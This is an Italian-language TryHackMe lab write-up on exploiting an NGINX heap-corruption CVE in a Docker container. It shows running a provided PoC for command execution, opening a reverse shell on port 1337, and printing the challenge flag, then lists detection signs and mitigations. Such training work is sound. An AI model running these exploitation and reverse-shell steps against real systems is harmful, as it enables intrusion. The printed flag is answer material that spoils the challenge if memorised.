Questo laboratorio dimostra lo sfruttamento di CVE-2024-24945, una vulnerabilità di corruzione dell'heap che colpisce NGINX. L'obiettivo era comprendere come la corruzione della memoria possa portare all'esecuzione remota di codice (RCE) e acquisire esperienza pratica nelle tecniche di sfruttamento, rilevamento e mitigazione.
Questo laboratorio dimostra lo sfruttamento di CVE-2024-24945, una vulnerabilità di corruzione dell'heap che colpisce NGINX. L'obiettivo era comprendere come la corruzione della memoria possa portare all'esecuzione remota di codice (RCE) e acquisire esperienza pratica nelle tecniche di sfruttamento, rilevamento e mitigazione.
. Verificare il servizio NGINX vulnerabile. . Eseguire comandi arbitrari utilizzando il proof of concept (PoC) fornito. . Ottenere una reverse shell sul container di destinazione. . Recuperare la flag della challenge. . Comprendere le strategie di rilevamento e mitigazione.
. Piattaforma: TryHackMe . Servizio Target: NGINX RIFT . Ambiente Containerizzato: Docker . Strumento Exploit: poc.py . Metodo di Accesso: VNC (Virtual Network Computing)
Verifica del Servizio
confermato che il container vulnerabile era in esecuzione e accessibile.
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42
backend ok
Eseguito il PoC fornito per convalidare l'esecuzione di comandi arbitrari.
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned
Verificata l'esecuzione riuscita:
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned
Output: hello from depthfirst
Stabilire una shell interattiva sul container di destinazione.
python3 poc.py --shell
Connessione Riuscita:
[] listening for reverse shell on port 1337... [] connected. $
Accesso alla flag della challenge.
cat /flag.txt
THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}
I difensori possono identificare tentativi di sfruttamento attraverso:
. Crash del worker NGINX . Eventi di segmentation fault . Connessioni di rete in uscita inaspettate . Processi shell sospetti (/bin/sh, bash) . Creazione non autorizzata di file in directory temporanee
. Aggiornare a una versione di NGINX patchata. . Applicare il principio del minimo privilegio. . Limitare il traffico di rete in uscita non necessario. . Implementare il monitoraggio continuo dei log. . Utilizzare controlli di sicurezza dei container e monitoraggio runtime.
Questo laboratorio ha fornito esperienza pratica in:
. Comprensione delle vulnerabilità di corruzione dell'heap. . Sfruttamento di vulnerabilità di esecuzione remota di codice. . Stabilire reverse shell. . Esecuzione della convalida post-sfruttamento. . Riconoscimento degli indicatori di compromissione e delle tecniche di mitigazione.
Questo esercizio è stato eseguito in un ambiente di laboratorio controllato di TryHackMe esclusivamente a scopo di formazione educativa e difensiva sulla cybersecurity.
Autore: [Benedict Ejepu Amaechi] Piattaforma: TryHackMe Argomento: CVE-2024-24945 9NGINX RIFT0 Sfruttamento e Difesa Data di Completamento: Giugno 2026